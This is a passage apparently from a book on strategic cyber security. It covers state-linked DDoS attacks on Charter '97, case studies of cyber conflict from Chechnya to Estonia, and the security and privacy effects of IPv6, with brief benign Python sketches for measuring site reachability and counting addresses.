(OSCE) issued a statement condemning the cyber attack. The Belarusian Ministry of Foreign Affairs denied any involvement. June 8, 2009: The most recent example of a politically-motivated DDoS attack on Charter ’97 occurred during a political row between the governments of Russia and Belarus, which resulted in the imposition of Russian economic sanctions against Belarus and a worsening of the political situation inside Belarus itself. The cyber attack lasted more than a week, and for a while it paralyzed the site com- pletely. The strength of the DDoS in this case was not particularly high; only around five thousand IP addresses took part in it. In cooperation with our ISP, the Charter ‘97 technical support staff was able to neutralize the attack. Countermeasures and their effectiveness: Charter ’97 is constantly looking for ways to counter government censorship, but there is no foolproof solution. 
The situ- ation in Belarus is best described as an effort to outmaneuver an opponent who has vastly more resources than they do. Over time, Charter ’97 has found some answers in technology and in cyber security expertise. They moved their site to a relatively powerful, hardened server,256 built an intrusion detection system, and constantly monitor vulnerabilities. They use en- cryption to access both the server and the site’s content management system. They have multi-tiered levels of access to both the server and the site, and they are able to quickly replace all passwords in the event administrators and/or journalists are ar- rested. They have a distributed system for creating server data backups. Moreover, they have endeavored to master simple, open-source technologies such as UNIX, PHP, and MySQL.257 All told, these efforts go a long way toward preventing the com- promise of the web server. Charter ’97 also launched the “Free Internet” project, which provides recommen- dations to visitors in case the site becomes unavailable. It explains how to use an Internet proxy, anonymizers, Virtual Private Networks (VPN), and software such as Tor.258 This information is rebroadcast via RSS259 and mirror websites, and visi- tors are encouraged to disseminate it through their own blogs, chat rooms, social networking, etc. These measures are sufficient to overcome simple IP blocking, but there is still no solid countermeasure to DDoS, especially with limited resources. 256 Firewall and caching technologies are sufficient to repulse DDoS-attacks of average strength. 257 This helps with site mobility (i.e. the rapid transfer of our site to another hosting platform). 258 The Onion Router or the Tor anonymity network. 259 Really Simple Syndication. 79 Cyber Security: Real-World Impact Charter ’97 believes that the government’s most effective methods of censorship are DoS attacks and various kinds of information manipulation. For the latter, intel- ligence operatives can insert themselves into ongoing discussions on the web in order to monitor or even “guide” conversations. If and when the political dialogue rises above a certain threshold, especially during politically sensitive points in time, the authorities can take action. Government power, cyber crime, and the future: The current Belarusian govern- ment suppresses political dissent on the Internet and flagrantly violates its own constitution. There is no legal basis for Internet censorship at all, much less for state- sponsored computer hacking and DoS attacks. Furthermore, such attacks could be used to block any kind of information. The result is the absence of the rule of law within the Belarusian Internet space, and a situation in which organized, state-spon- sored cyber crime could flourish, not only in Belarus but also beyond its borders. There is active cooperation between Belarusian and Russian intelligence agencies in cyberspace, as specified in the Agreement on Cooperation of the Commonwealth of Independent States (CIS) in Combating Cybercrime, signed in 2000. And there are strong similarities between attacks on Estonia, Georgia, and the websites of human rights organizations in Belarus and Russia. These Internet crimes share common characteristics and appear to have common roots. Civil society is threatened throughout Eastern Europe: in Belarus, Ukraine, Russia, Georgia, Armenia, and Azerbaijan, governments have likely used DoS attacks as a tool for suppressing political dissent. 
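Measures like these boil down to simple measurements taken continuously and compared across vantage points. The short Python sketch below is an illustration only, not Charter '97's actual tooling: it fetches each URL on a watch list once and records the HTTP status and elapsed time, so that results gathered from connections inside and outside a country can be compared to distinguish an ordinary outage from selective IP filtering or bandwidth "shaping." The URL list, the timeout value, and the helper name probe are placeholders chosen for the example.

    # Minimal reachability/latency probe (illustrative sketch only).
    # Fetch each test URL once and print HTTP status plus elapsed time.
    # Run from vantage points inside and outside the country and compare:
    # "unreachable" from one side only suggests filtering, while a normal
    # status with very long load times suggests bandwidth "shaping."
    import time
    import urllib.error
    import urllib.request

    TEST_URLS = [
        "https://www.example.org/",   # placeholder for a monitored site
        "https://www.example.net/",   # placeholder for a mirror
    ]
    TIMEOUT_SECONDS = 60  # generous, so throttled-but-alive sites still register

    def probe(url):
        """Return (status_text, seconds_elapsed) for a single fetch."""
        start = time.monotonic()
        try:
            with urllib.request.urlopen(url, timeout=TIMEOUT_SECONDS) as resp:
                resp.read(4096)              # sample the body, not the whole page
                status = "HTTP %d" % resp.status
        except urllib.error.HTTPError as err:
            status = "HTTP %d" % err.code    # server answered with an error code
        except (urllib.error.URLError, OSError) as err:
            status = "unreachable (%s)" % err
        return status, time.monotonic() - start

    if __name__ == "__main__":
        for url in TEST_URLS:
            status, elapsed = probe(url)
            print("%-40s %-25s %6.1fs" % (url, status, elapsed))

Even so crude a probe captures the signature described above: pages that remain technically reachable but take many minutes to load from domestic connections while loading normally from abroad.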
In response, a multinational, collaborative approach is required. A good start would be the creation of an international web hosting platform designed to support free- dom of speech throughout Europe. It should be built by a team of international experts, who could improve defenses and investigate attacks based on aggregate data. Privacy must of course be balanced with legitimate law enforcement powers, but the mere creation of an international platform would enhance cyber security and freedom of expression in Europe, especially during important events such as national elections. 80 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY International Conflict in Cyberspace Chapter 4 has demonstrated that many governments already perceive a clear con- nection between cyber security and internal political security. But what about inter- national conflict? To what extent can nation-states threaten their peers, and even defeat their rivals, in cyberspace? In fact, all international political and military conflicts now have a cyber dimension, the size and impact of which are difficult to predict. Today, practically everything that happens in the “real world” is mirrored in cyberspace, and for national security planners this includes propaganda, espionage, and – to an unknown but increasing extent – warfare itself. The Internet’s ubiquitous and unpredictable characteristics can make the battles fought in cyberspace just as important, if not more so, than events taking place on the ground. A brief analysis of current events proves that international cyber con- flict is already commonplace. Here are five illustrative examples that suggest it is no longer a question of whether computer hackers will take world leaders by surprise, but when and under what circumstances. Chechnya 1990s: Propaganda In the Internet era, unedited news from a war front can arrive in real-time. As a result, Internet users worldwide play an important role in international conflicts simply by posting information, in either text or image format, to a website. Since the earliest days of the World Wide Web, Chechen guerilla fighters, armed not only with rifles but with digital cameras and HTML, have clearly demonstrated the power of Internet-enabled propaganda. Since the earliest days of the World Wide Web, pro-Chechen and pro-Russian forces have waged a virtual war on the Internet, simultaneous with their conflict on the ground. The Chechen separatist movement in particular is considered a pioneer in the use of the Web as a tool for delivering powerful public relations messages. The skillful placement of propaganda and other information, such as the number to a war funds bank account in Sacramento, California, helped to unite the Chechen diaspora.260 260 Thomas, 2002. 81 Cyber Security: Real-World Impact The most effective information, however, was not pro-Chechen, but anti-Russian. Digital images of bloody corpses served to turn public opinion against perceived Russian military excesses. In 1999, just as Kremlin officials were denying an inci- dent in which a Chechen bus was attacked and many passengers killed, images of the incident appeared on the Web.261 As technology progressed, Internet surfers watched streaming videos of favorable Chechen military activity, such as ambushes on Russian military convoys.262 The Russian government admitted the need to improve its tactics in cyberspace. In 1999, Vladimir Putin, then Russia’s Prime Minister, stated that “we surrendered this terrain some time ago ... 
but now we are entering the game again.” Moscow sought the help of the West in shutting down the important pro-Chechen kavkaz.org web- site, and “the introduction of centralized military censorship regarding the war in the North Caucasus” was announced.263 During the second Chechen war (1999-2000), Russian officials were accused of es- calating the cyber conflict by hacking into Chechen websites. The timing and so- phistication of at least some of the attacks suggested nation-state involvement. For example, kavkaz.org (hosted in the U.S.) was reportedly knocked offline simultane- ously with the storming by Russian special forces of a Moscow theater under siege by Chechen terrorists.264 Kosovo 1999: Hacking the Military In globalized, Internet-era conflicts, anyone with a computer and a connection to the Internet is a potential combatant. NATO’s first major military engagement followed the explosive growth of the Web during the 1990s. Just as Vietnam was the world’s first TV war, Kosovo was its first broad-scale Internet war. As NATO planes began to bomb Serbia, numerous pro-Serbian (or anti-Western) hacker groups, such as the “Black Hand,” began to attack NATO Internet infrastruc- ture. It is unknown whether any of the hackers worked directly for the Yugoslav military. Regardless, their stated goal was to disrupt NATO’s military operations.265 The Black Hand, which borrowed its name from the Pan-Slavic secret society that helped to start World War I, claimed it could enumerate NATO’s “most important” computers, and that through hacking it would attempt to “delete all the data” on 261 Goble, 1999. 262 Thomas, 2002. 263 Goble, 1999. 264 Bullough, 2002. 265 “Yugoslavia...” 1999. 82 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY them. The group claimed success on at least one U.S. Navy computer, and stated that it was subsequently taken off-line.266 NATO, U.S., and UK computers were all attacked during the war, via Denial-of-Service and virus-infected email (twenty-five different strains of viruses were detected).267 In the U.S., the White House website was defaced, and a Secret Service investigation ensued. While the U.S. claimed to have suffered “no impact” on the overall war effort, the UK admitted to having lost at least some database information.268 At NATO Headquarters in Belgium, the attacks became a propaganda victory for the hackers. The NATO public affairs website for the war in Kosovo, where the or- ganization sought to portray its side of the conflict via briefings and news updates, was “virtually inoperable for several days.” NATO spokesman Jamie Shea blamed “line saturation” on “hackers in Belgrade.” A simultaneous flood of email successfully choked NATO’s email server. As the organization endeavored to upgrade nearly all of its computer servers, the network attacks, which initially started in Belgrade, began to emanate from all over the world.269 Middle East 2000: Targeting the Economy During the Cold War, the Middle East often served as a proving ground for military weapons and tactics. In the Internet era, it has done the same for cyber warfare. In October 2000, following the abduction of three Israeli soldiers in Lebanon, blue and white flags as well as a sound file playing the Israeli national anthem were planted on a hacked Hizballah website. 
Subsequent pro-Israeli attacks targeted the official websites of military and political organizations perceived hostile to Israel, including the Palestinian National Authority, Hamas, and Iran.270 Retaliation from Pro-Palestinian hackers was quick and much more diverse in scope. Israeli political, military, telecommunications, media, and universities were all hit. The attackers specifically targeted sites of pure economic value, including the Bank of Israel, e-commerce, and the Tel Aviv Stock Exchange. At the time, Israel was more wired to the Internet than all of its neighbors combined, so there was no shortage of targets. The “.il” country domain provided a well-defined list that pro-Palestinian hackers worked through methodically. 266 Ibid. 267 “Evidence...” 1999. 268 Geers, 2005. 269 Verton, 1999. 270 For example, the Zone-H website lists 67 such defacements from pro-Israeli hacker m0sad during this time period. 83 Cyber Security: Real-World Impact Wars often showcase new tools and tactics. During this conflict, the “Defend” DoS program was used to great effect by both sides, demonstrating in part that software can be copied more quickly than a tank or a rifle. Defend’s innovation was to con- tinually revise the date and time of its mock Web requests; this served to defeat the Web-caching security mechanisms at the time.271 The Middle East cyber war demonstrated that Internet-era political conflicts can quickly become internationalized. For example, the Pakistan Hackerz Club penetrat- ed the U.S.-based pro-Israel lobby AIPAC and published sensitive emails, credit card numbers, and contact information for some of its members.272 The telecommunica- tions firm AT&T – clearly an international critical infrastructure service provider to all sectors of the world economy – was targeted for providing technical support to the Israeli government during the crisis.273 Since 2000, the Middle East cyber war has generally followed the conflict on the ground. In 2006, as tensions rose on the border between Israel and Gaza, pro-Pal- estinian hackers shut down around 700 Israeli Internet domains, including those of Bank Hapoalim, Bank Otsar Ha-Hayal, BMW Israel, Subaru Israel, and McDonalds Israel.274 U.S. and China 2001: Patriotic Hacking On April 26, 2001, the Federal Bureau of Investigation’s (FBI) National Infrastruc- ture Protection Center (NIPC) released Advisory 01-009: “Citing recent events between the United States and the People’s Republic of China (PRC), malicious hackers have escalated web page defacements over the Internet. This communication is to advise network administrators of the potential for in- creased hacker activity directed at U.S. systems .... Chinese hackers have publicly discussed increasing their activity during this period, which coincides with dates of historic significance in the PRC....”275 Tensions had risen sharply between the two countries following the U.S. bombing of the Chinese embassy in Belgrade in 1999, the mid-air collision of a U.S. Navy plane with a Chinese fighter jet over the South China Sea in 2001, and the prolonged de- tainment of the American crew in the PRC. 271 Geers & Feaver, 2004. 272 “Israel...” 2000. 273 Page, 2000. 274 Stoil & Goldstein, 2006. 275 “Advisory 01-009...” 2001. 
Hackers on both sides of the Pacific, such as China Eagle Alliance and PoizonB0x, began wide-scale website defacement and built hacker portals with titles such as "USA Kill" and "China Killer." When the cyber skirmishes were over, both sides claimed defacements and DoSs in the thousands.276

The FBI investigated a 17-day hack by the Honker Union of China (HUC) of a California electric power grid test network that began on April 25th.277 The case was widely dismissed as media hype at the time, but the CIA informed industry leaders in 2007 that not only is a tangible hacker threat to such critical infrastructure possible, it in fact has already happened.278

On the anniversary of this cyber war, as businesses were bracing for another round of hacking, the Chinese government is said to have successfully called for a stand-down at the last minute, suggesting that Chinese hackers may share a greater degree of coordination than their American counterparts.279

Estonia 2007: Targeting a Nation-State

On April 26, 2007, the Estonian government moved a Soviet World War II memorial from the center of its capital to a military cemetery. The move inflamed public opinion both in Russia and among Estonia's Russian minority population. Beginning on April 27, Estonian government, law enforcement, banking, media, and Internet infrastructure endured three weeks of cyber attacks, whose impact still generates immense interest from governments around the world.

Estonians conduct over 98% of their banking via electronic means. Therefore, the impact of multiple Distributed Denial-of-Service (DDoS) attacks, which severed all communications to the Web presence of the country's two largest banks for up to two hours and rendered international services partially unavailable for days at a time, is obvious.

Less widely discussed, but likely of greater consequence – both to national security planners and to computer network defense personnel – were the Internet infrastructure (router) attacks on one of the Estonian government's ISPs, which disrupted government communications for a "short" period of time.280

276 Wagstaff, 2001; Allen & Demchek, 2003. 277 Weisman, 2001. 278 Nakashima & Mufson, 2008. 279 Hess, 2002. 280 This case-study relies on some data available exclusively to CCD-CoE.

On the propaganda front, a hacker defaced the Estonian Prime Minister's political party website, changing the homepage text to a fabricated government apology for having moved the statue, along with a promise to move it back to its original location.

Diplomatic interest in the Estonia case was high, in part due to the possible reinterpretation of NATO's Article 5, which states that "an armed attack against one [Alliance member]... shall be considered an attack against them all."281 Article 5 has been invoked only once, following the terrorist attacks of September 11, 2001. Potentially, it could one day be interpreted to encompass cyber attacks as well.

For many observers, the 2007 denial-of-service attacks in Estonia demonstrated a clear "business case" cyber attack model against an IT-dependent country.
The crisis significantly influenced the 2010 debate over NATO's new Strategic Concept, when cyber security assumed a much higher level of visibility in international security dialogue, ranking alongside terrorism and ballistic missiles as a primary threat to the Alliance.282

To summarize Part II of this book, the world has witnessed the transformation of cyber security from a technical discipline to a strategic concept. The growing power of the Internet, the rapid development of hacker tools and tactics, and clear-cut examples from current events suggest that cyber attacks will play an increasingly important, and perhaps a lead role, in future international conflicts. Since the Estonia crisis in 2007, this trend shows no sign of slowing down:

• in 2007, the Israeli military is reported to have conducted a cyber attack against Syrian air defense prior to its destruction of an alleged nuclear reactor;283
• in 2008, many analysts argued that the Russo-Georgian war demonstrated that there will be a close relationship between cyber and conventional operations in all future military campaigns;284
• in 2009, during a time of domestic political crisis, hackers knocked the entire nation-state of Kyrgyzstan offline;285 and
• in 2010, the Stuxnet worm was believed to be the most sophisticated piece of malware yet examined by public researchers and is widely assumed to have been written by a state sponsor.286

281 "The North Atlantic Treaty," 1949. 282 "NATO 2020..." 2010. 283 Fulghum et al, 2007. 284 "Overview..." 2009. 285 Keizer, 2009. 286 "Stuxnet..." 2010.

Therefore, national security leadership has no choice but to dramatically increase its level of understanding of the technology, law, and ethics related to cyber attack and defense so that it can competently factor cyber conflict, terrorism and warfare into all stages of national security planning. Part III of this book will examine four strategies that nation-states are likely to adopt as they seek to mitigate the threat of cyber attacks and attempt to improve their national cyber defense posture.

III. NATION-STATE CYBER ATTACK MITIGATION STRATEGIES

Part II of this book examined the advent of cyber security as a strategic concept. Part III will evaluate four likely strategies that governments will employ to mitigate the cyber attack threat: the "next-generation" Internet Protocol version 6 (IPv6), an application of the world's best military doctrine (Sun Tzu's Art of War) to cyber warfare, cyber attack deterrence, and cyber arms control.

5. NEXT GENERATION INTERNET: IS IPV6 THE ANSWER?287

First and foremost, governments will seek to reach a higher level of strategic cyber security through improved technology. And the most likely candidate to have an effect at the strategic level is a sleeping giant – the new "language" of networks, Internet Protocol version 6 (IPv6). In fact, due to its stellar number of viable computer addresses and its enhanced security features, many nations view IPv6 as crucial to their national security plans for the future. However, its high learning curve has led myriad government agencies and large businesses to miss deadlines for IPv6 compliance. A different perspective is offered by some human rights organizations, which fear that the "next-generation" Internet will have adverse effects on individual privacy and online anonymity.
Regarding IPv6 security, a key point to understand is that, during the long transition period from IPv4 to IPv6, hackers will be able to exploit vulnerabilities in both languages at once.

IPv6 Address Space

IPv4, the current language of the Internet, will run out of available IP addresses – or "space" from which one can connect to the Internet – in 2011. The address shortage is especially acute in the developing world, which connected to the Internet after most IP addresses had already been allocated or bought.288

287 This chapter was co-authored with Alexander Eisen. 288 Grossetete et al, 2008.

IPv6 decisively answers the need for more IP addresses. IPv4 has around four billion, which seemed like a lot when the protocol was written in the early 1980s, but is insufficient today. IPv6, developed in the late 1990s, has 128-bit addresses, which create 340 undecillion IPs,289 or 50 octillion for every human on Earth.290

As an added bonus, IPv6 employs much more powerful IP "headers," or internal management data, which allow for more advanced features and customization than with IPv4. IPv6 headers will be used to support "telematics," the integrated use of telecommunications and informatics. Since IPv6 will allow practically everything, including common household appliances, to be connected to the Internet, its advocates argue that telematics will provide more convenient, economical, and entertaining lifestyles.291

Improved Security?

But the most important aspect of IPv6 for this research is that it was designed to provide better security than IPv4.292 The goal was to build security into the protocol itself. Thirty years ago, IPv4 defeated more feature-rich rivals precisely because IP was a "dumb" protocol. It lacked sophistication, but was simple, resilient, and easy to implement and maintain. The problem was that IPv4's lack of intrinsic security left it open to misuse. Today, a better network protocol is needed, both for size and for security.

IPv6 offers clear security upgrades over IPv4. First, IPv6 is much more cryptography-friendly. A mechanism called IP Security (IPSec) is built directly into the protocol's "code stack." IPSec should reduce Internet users' vulnerability to spoofing,293 illicit traffic sniffing294 and Man-in-the-Middle (MITM) attacks.295 IPv6 also offers end-to-end connectivity, which is afforded by the incredibly high number of IP addresses available. Since it is possible, in theory, to give anything an IP address, any two points on the Internet may communicate directly with each other.

289 Or 340,282,366,920,938,463,463,374,607,431,768,211,456 possible addresses. 290 An IPv4 address looks like this: 207.46.19.60. IPv6 is much longer: 2001:0db8:0000:0000:0000:0000:1428:57ab (or, for short, 2001:0db8::1428:57ab). 291 Godara, 2010: The term telematics often refers to automation in automobiles, such as GPS navigation, hands-free cell phones, and automatic driving assistance systems. 292 Hagen, 2002. 293 Spoofing means impersonating another computer user or program. 294 Passively collecting network data, with or without appropriate approval. 295 This is when an attacker secretly controls both sides of a conversation. The victims think they are speaking with one another directly, for example, by email, when in fact they are not.

These upgrades should have numerous follow-on benefits.
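To make the scale of the figures cited above concrete, the following is a minimal arithmetic sketch in Python. The world-population value of roughly seven billion is an assumed round figure used only for illustration, and the sample address is the one given in the footnote above; nothing else is taken from the text.

```python
import ipaddress

# Size of the IPv4 (32-bit) and IPv6 (128-bit) address spaces
ipv4_total = 2 ** 32
ipv6_total = 2 ** 128
print(f"IPv4 addresses: {ipv4_total:,}")
print(f"IPv6 addresses: {ipv6_total:,}")

# Addresses per person, assuming ~7 billion people (illustrative figure)
world_population = 7 * 10 ** 9
print(f"IPv6 addresses per person: {ipv6_total / world_population:.3e}")

# Long and short forms of the sample IPv6 address from the footnote
addr = ipaddress.IPv6Address("2001:0db8:0000:0000:0000:0000:1428:57ab")
print(addr.exploded)    # 2001:0db8:0000:0000:0000:0000:1428:57ab
print(addr.compressed)  # 2001:db8::1428:57ab
```

The per-capita division comes out on the order of 5 × 10^28, which is the "50 octillion for every human on Earth" figure cited above.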
For example, the astro- nomical number of IP addresses may mean that attackers will no longer be able to randomly “scan” the Internet to find their victims. In addition, the Internet should be more resistant to self-propagating worms.296 To improve strategic cyber security across the Internet, any successor to IPv4 should have a greater focus on structure and logic (e.g., Internet navigation, data packet routing, IP address allocation). Fortunately, with IPv6, this is the case. The Internet Engineering Task Force (IETF) created the first IPv6 Forum in 1999; today there are IPv6-specific Task Forces worldwide, which still have the opportunity to make tangible improvements in the next-generation protocol as it evolves. IPv6 Answers Some Questions, Creates Others In spite of these promising characteristics, it is unlikely that IPv6 will end cyber at- tacks in the future. Hackers have already demonstrated that IPv6 is not invulnerable to many traditional, IPv4 attack methods, including DoS,297 packet crafting,298 and MITM attacks.299 Vulnerabilities in software (operating systems, network services, web applications) will continue to exist, no matter which protocol they use.300 And perhaps most crucially, although IPSec is available, it is not required.301 As an analogy, the history of Public Key Infrastructure (PKI)302 does not bode well for IPv6. The high cost and resource-intensive nature of PKI pose challenges to most organizations, and in the future, the same dynamic could hamper the large-scale deployment of IPSec in IPv6. False identities are often assumed by stealing or creating fraudulent ID cards or other documents. Via the Internet, attackers will still attempt to use hacked comput- ers as “proxies” for nefarious activity, even in the IPv6 era. The case of Stuxnet has 296 Popoviciu et al, 2006. 297 E.g., Smurf6, Rsmurf6, Redir6, connection flooding, and stealing all available addresses. 298 This refers to manually creating network data packets instead of using default or existing network traffic characteristics. 299 Or “man-in-the-middle” attacks, e.g., Parasite6, Fake_router6. 300 In fact, the majority of attacks today may not involve eavesdropping on or manipulating the traffic on a network wire. A compromised application, for example, could exfiltrate stolen information equally well via either the IPv4 or the IPv6 code stack. 301 It is also important to note that the improved IP header still does not travel across the Internet en- crypted, but in the clear. 302 This refers to the management of digital certificates. PKI uses asymmetric cryptography to create an electronic identity. Internet services are increasingly using it, and this should lower the risk of identity theft, but Stuxnet has shown that PKI is not a silver bullet. 90 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES shown that, even with PKI safeguards, it is possible to steal digital identities that al- low a hacker to run computer code as if it were installed by a trustworthy company. And of course, the next-generation Internet will spawn next-generation attacks. For example, if IPv6 precludes network vulnerability scanning, hackers may increas- ingly target Certificate Authorities (CA) and Domain Name Servers (DNS). In fact, a successful compromise of a DNS server may be required for an attacker to acquire detailed knowledge of a target Local Area Network (LAN).303 The necessarily long transition period will provide its own set of challenges. 
The most important is that, as the world uses both IP languages at once, hackers will have an increased “attack surface.” There will simply be a higher number of vulner- abilities to exploit as computer security personnel are forced to defend a larger network space within their enterprise. The level of complexity will rise as system administrators manage more devices per enterprise, more network interface cards (NIC) per device, and more code “stacks” or data structures per NIC. Furthermore, some network data will be “native” or IPv6- only, but other IPv6 traffic will be “tunneled” or shuttled across the Internet within IPv4 carrier packets. Such a new and complex environment may allow some cyber attacks to slip through myriad cracks in cyber defense architecture. In fact, this may already be the case on countless networks, given that modern devices and operating systems are often IPv6-enabled by default. The opposite is true for computer network defense. For example, even in the latest version of the world’s most popular intrusion detection software, called “Snort,” IPv6 awareness is not enabled by default, but must be specifically turned on by a security analyst.304 The likely result is a serious blind spot in global network traffic analysis. Consider the “auto-configuration” aspect of IPv6. Its intended function is to ease and increase mobility through enhanced, ad hoc network associations. This appears to be an exciting part of the world’s future networking paradigm. However, auto- configuration would also seem to greatly complicate the task of tracking network- enabled devices that enter and leave enterprise boundaries. 303 If DNS attacks are successful in the IPv6 era, the overall trend toward client-side exploits – those which target the end user – should continue. 304 “SNORT Users Manual...” 2011. 91 Next Generation Internet: Is IPv6 the Answer? Privacy Concerns From a law enforcement and national security perspective, there is worldwide inter- est in the implications of IPv6 for online privacy and anonymity, which will have a tangible impact on relations between government and civil society. IPv6 security, specifically in the form of IPsec, contains a potential paradox. Users gain end-to-end connectivity with peers and acquire strong encryption to obscure the content of their communications, but the loss of Network Address Translation (NAT) means that it is easier for third parties to see who is communicating with whom. Even if an eavesdropper is not able to read encrypted content, “traffic analy- sis” – or the deduction of information content by analyzing communication patterns – should be easier than with IPv4. NAT allows multiple users to connect to the Internet from one IP address. It almost single-handedly saved IPv4 from address depletion for many years.305 Further, NAT provides Internet users with some “security through obscurity” by making IP ad- dresses temporary and not permanently associated with a human user. This charac- teristic offers a small but tangible amount of Internet privacy. Critics of NAT claim that it is labor-intensive, expensive, and unnecessary, but others worry that its loss will come at the expense of privacy. For example, Chinese Internet Society chairwoman Hu Qiheng told the New York Times in 2006 that “there is now anonymity for criminals on the Internet in China ... 
with the China Next Generation Internet project, we will give everyone a unique identity on the Internet.”306 The simple reasoning behind Qiheng’s thinking is that IPv6 could facilitate the direct association of a permanent IP address to a particular Internet user. For law enforce- ment, end-to-end connectivity may help to solve the vexing “attribution” problem of cyber attacks, in which hackers are able to remain anonymous. But human rights groups fear that governments will use this new power to quash political dissent. This open question is serious enough that, in the future, various national IPv6 im- plementations may be incongruous or even incompatible with one another, as differ- ent network configurations are used for different purposes. IPv6 “privacy extensions” were designed to address this problem by making it pos- sible for a user to acquire somewhat random, temporary IP addresses in order to surf the web with greater privacy and security. Only time will tell whether IPv6 privacy extensions work in practice. Since IPv6 is just now being broadly deployed, 305 IPv4’s lifespan was also extended by coding other aspects of IPv6, such as IPSec, into IPv4. 306 Crampton, 2006. 92 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES many of its advanced features have not been subjected to sufficient testing or secu- rity analysis.307 In 2011, it is still unknown whether the IPv6 era will favor attackers or defenders in cyberspace. In the long-run, it is possible that the new protocol’s benefits will be good for overall Internet security. However, it is a near certainty that the long transi- tion phase from IPv4 to IPv6 will be characterized by increased security risks. Uneven Worldwide Deployment Many governments are not waiting for this debate to be settled. In a network-centric world, future Internet technologies such as IPv6 cannot be ignored. A government’s ability to conduct national security-related operations may depend on them one day. Nations and businesses risk falling behind peers, competitors, and enemies. Thus, numerous governments have set deadlines for various levels of IPv6 compliance. In the United States, the Executive Branch Office of Management and Budget (OMB) mandated that U.S. government agencies be “IPv6 compliant” by June 30, 2008. However, compliance in this case had very limited goals.308 Furthermore, the OMB mandate was almost immediately contradicted by a U.S. Department of Commerce report advising that premature transition to IPv6 could lead to higher overall transi- tion costs and even reduced security. More recently, the first U.S. Chief Information Officer (CIO), Vivek Kundra, provided a more detailed government directive – public Internet services such as webmail and DNS must operationalize “native” or IPv6-only traffic by October 2012. Internal networks must do the same by 2014.309 Most American businesses feel no direct pressure to migrate to IPv6. The reason is that the U.S. is the original home of the Internet, so most American firms possess enough IP addresses to satisfy their needs. However, the largest software compa- nies, such as Microsoft, support IPv6 because it should reduce or even eliminate the costs associated with NAT, which can be significant for online gaming, instant mes- saging, file sharing, etc.310 Indeed, Microsoft made IPv6 the default Internet protocol for its Vista operating system, which was released in January 2007. 307 Barrera, 2010. 
308 This referred only to the capability of an agency's core computer networks to forward IPv6 traffic to its intended destination. 309 Montalbano, 2010. 310 Golding, 2006.

China has made the most determined effort of any nation to transition to IPv6. Above all, the size of China's population demands a huge increase in its number of IP addresses since China has only one IPv4 address for every four of its citizens. At the same time, China has held the world's biggest single IPv6 demonstration to date. During the 2008 Summer Olympics in Beijing, everything from live television and data feeds to security and traffic control was streamed over one vast IPv6 network.311 The cutting-edge nature of IPv6 gives China a good way to develop its Intellectual Property (IP) base. The China Next Generation Internet (CNGI) and the China Education and Research Network (CERNET) are huge IPv6 projects that will influence the evolution of the Internet for years to come. However, the slow pace of popular IPv6 application development, which has helped to keep worldwide transition sluggish, has disappointed Chinese Internet officials.312

Within the European Union (EU), an IPv6 Task Force has stated that the importance of the next-generation Internet "cannot be overestimated." In 2008, the European Commission advised private companies and the public sector to make the switch by 2010 and committed €90 million to IPv6 research.313 But near the end of 2009, a survey found that less than 20% had done so and that a majority of respondents feared its immediate financial costs.314 On the bright side, numerous European companies have made commercial contributions to IPv6 development. Ericsson built the world's first IPv6 router in 1995, and an IPv6 concept car was jointly developed by Cisco and Renault. Nonetheless, European companies have complained that further incentives from Brussels are needed to ensure a smooth transition.315

In Japan, the need for increased address space is similar to China's, but the reason is not population size. It stems from the desire to connect billions of electronic gadgets to the Internet. The Japanese government has assured its country a leadership role in IPv6 deployment by offering tax breaks to companies that switch to IPv6. Its importance is emphasized in political speeches at the highest level of government316 and by initiatives such as "eJapan 2005," in which IPv6 was given prominent status. NTT, the largest telecommunications provider in Japan, has offered commercial IPv6 services since 2001, and the University of Tokyo has held both the IPv4 and IPv6 "World Speed" records simultaneously. As in China, however, both the public and private sectors are still waiting for more IPv6 applications, even while they are attempting to future-proof their infrastructure.317

311 "Renumbering..." 2011. 312 Geers & Eisen, 2007. 313 Meller, 2008. 314 Kirk, 2009. 315 Geers & Eisen, 2007. 316 Essex, 2008.

Differences of Opinion Remain

While there are obvious business opportunities in IPv6, governments are also keenly interested in the strategic cyber security ramifications of the next-generation Internet. The loss of NAT will lower the cost of Internet connectivity and provide the foundation for improved communications worldwide, but it may also allow governments to monitor their Internet space – at least via traffic analysis – with much greater ease.
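To illustrate what "traffic analysis" means in practice, here is a minimal sketch: even when every payload is encrypted, an observer who can see only source and destination addresses can still build a picture of who communicates with whom and how often. The flow records below are invented purely for illustration.

```python
from collections import Counter

# Hypothetical flow records: (source, destination) address pairs that a
# network observer can see even when all payloads are encrypted.
flows = [
    ("2001:db8::10", "2001:db8::53"),
    ("2001:db8::10", "2001:db8::53"),
    ("2001:db8::10", "2001:db8::80"),
    ("2001:db8::22", "2001:db8::53"),
]

# Counting who talks to whom is the essence of traffic analysis.
for (src, dst), count in Counter(flows).most_common():
    print(f"{src} -> {dst}: {count} connection(s)")
```

Without NAT aggregating many users behind a single address, each such pair maps far more directly to an individual machine – which is precisely the privacy concern raised above.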
As an international project, IPv6 will both benefit and suffer from significant differences of approach and opinion. In Asia, citizens are more comfortable with government oversight than in the West. In Europe, Internet users are highly motivated to protect online anonymity. The U.S., however, is somewhere in the middle – personal information is jealously guarded, but the public is sympathetic to the needs of law enforcement.

In order to make the IPv6 era fairer than the IPv4 era, the Internet Assigned Numbers Authority (IANA) has published these guidelines:

• every address should be unique;
• every address should be in an accessible registry database;
• distribution should be aggregated, efficient, and hierarchical;
• there should be no "stockpiling" of unused addresses; and
• all potential members of the Internet community should have equal access.

Another factor is the "IPv6 Ready Logo," which is awarded to software and hardware that meet internationally recognized technical standards. However, this initiative has already revealed the politically charged atmosphere surrounding IPv6. For example, China successfully argued against the direct inclusion of IPSec in the Logo award criteria, a seemingly small victory that could have enormous implications for privacy, anonymity, and security on the web for years to come. It remains an open question whether the U.S. and the EU should have pushed China harder during these negotiations. However, like China, they must worry that IPsec will make life too hard for law enforcement.318

317 Geers & Eisen, 2007. 318 Geers & Eisen, 2007.

6. SUN TZU: CAN OUR BEST MILITARY DOCTRINE ENCOMPASS CYBER WAR?

Cyberspace is a new warfare domain. Computers and the information they contain are prizes to be won during any military conflict. But the intangible nature of cyberspace can make victory, defeat, and battle damage difficult to calculate. Military leaders today are looking for a way to understand and manage this new threat to national security. The most influential military treatise in history is Sun Tzu's Art of War. Its recommendations are flexible and have been adapted to new circumstances for over 2,500 years. This chapter examines whether Art of War is flexible enough to encompass cyber warfare. It concludes that Sun Tzu provides a useful but far from perfect framework for the management of cyber war and urges modern military strategists to consider the distinctive aspects of the cyber battlefield.
